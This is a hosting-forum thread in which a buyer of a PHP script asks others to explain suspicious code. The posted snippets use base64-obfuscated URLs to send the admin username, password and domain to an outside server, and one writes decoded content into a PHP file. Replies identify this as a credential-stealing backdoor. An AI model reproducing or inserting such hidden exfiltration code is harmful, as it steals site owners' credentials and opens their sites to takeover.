Activity Stream
48,167 MEMBERS
6886 ONLINE
besthostingforums On YouTube Subscribe to our Newsletter besthostingforums On Twitter besthostingforums On Facebook besthostingforums On facebook groups

Results 1 to 7 of 7
  1.     
    #1
    Member
    Website's:
    HieBye.com BinEdris.com

    Default base64_decode help

    If some one can help me explain this

    Code: 
    function problem($error) {
    ih();
    echo iot('<font color="FF0000" size=3>ERROR</font><br><br>'.$error);
    ift(); }
    function b72($a) {
    global $s;
    $r = fetchURL(str_replace(' ','',base64_decode('aHR0cDovLzNidi5iaXovY2gvMS5waHA/c2M9').
    "$s[cs]&u=$a[p_user]&p=$a[p_pass]&d=$a[p_domain]&url=$a[site_url]"));
    if ($r) return $r; return false; }
    function b63($a) { global $s; $sb = fopen("$s[phppath]/data/info.php",'w');
    fwrite($sb,'<?PHP $info = base64_decode(\''.$a.'\'); ?>'); fclose($sb); 
    if ($r[0]) return $r[0]; return false;
    }

    And this

    Code: 
    function publisher_deleted($in) {
    global $s;
    check_admin('publishers');
    publisher_delete_process($in[n]);
    if ($s[no_stop]) return false;
    ih();
    echo iot('Selected publisher has been deleted');
    if ($in[return_to]) echo '<a href="'.$in[return_to].'">Back to previous page</a><br><br>';
    ift(); }
    $s[sp] = base64_decode('aHR0cDovLzNidi5iaXovY2gvMi5waHA/c2M9').$s[cs].'&x=';

    It would be really helpful for me
    wCruiser Reviewed by wCruiser on . base64_decode help If some one can help me explain this function problem($error) { ih(); echo iot('<font color="FF0000" size=3>ERROR</font><br><br>'.$error); ift(); } function b72($a) { global $s; $r = fetchURL(str_replace(' ','',base64_decode('aHR0cDovLzNidi5iaXovY2gvMS5waHA/c2M9'). "$s&u=$a&p=$a&d=$a&url=$a")); Rating: 5


  2.   Sponsored Links

  3.     
    #2
    Member
    Website's:
    litewarez.net litewarez.com triniwarez.com
    What this is doing is sending your pass and username to another script

    lol this is what hackers use to get your ps

    PHP Code: 
    "$s[cs]&u=$a[p_user]&p=$a[p_pass]&d=$a[p_domain]&url=$a[site_url]
    sends to there script

    PHP Code: 
    "?u=USER&p=PASS&d=DOMAIN&url=SCRIPT_URL" 
    and also looks like its writing external php commands to a file where he can exploit your site with a shell!
    Join Litewarez.net today and become apart of the community.
    Unique | Clean | Advanced (All with you in mind)
    Downloads | Webmasters


    Notifications,Forum,Chat,Community all at Litewarez Webmasters


  4.     
    #3
    Super Member
    I really hope you're not using this code o.o

    So kiss me and smile for me, say that you'll wait for me <'3

  5.     
    #4
    Member
    Website's:
    servedome.com
    Quote Originally Posted by Sp32 View Post
    I really hope you're not using this code o.o
    They are not very bright if they are.

  6.     
    #5
    Member
    Website's:
    HieBye.com BinEdris.com
    I actually brought this script .Want to make sure its safe


  7.     
    #6
    Member
    base64_decode('aHR0cDovLzNidi5iaXovY2gvMS5waHA/c2M9'):
    base64_decode('aHR0cDovLzNidi5iaXovY2gvMi5waHA/c2M9')
    Hope this helps in some way

  8.     
    #7
    Member
    Website's:
    HieBye.com BinEdris.com
    Any idea how to stop sending this code ?


    Figured it out ...


    thanks


Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Tags for this Thread

BE SOCIAL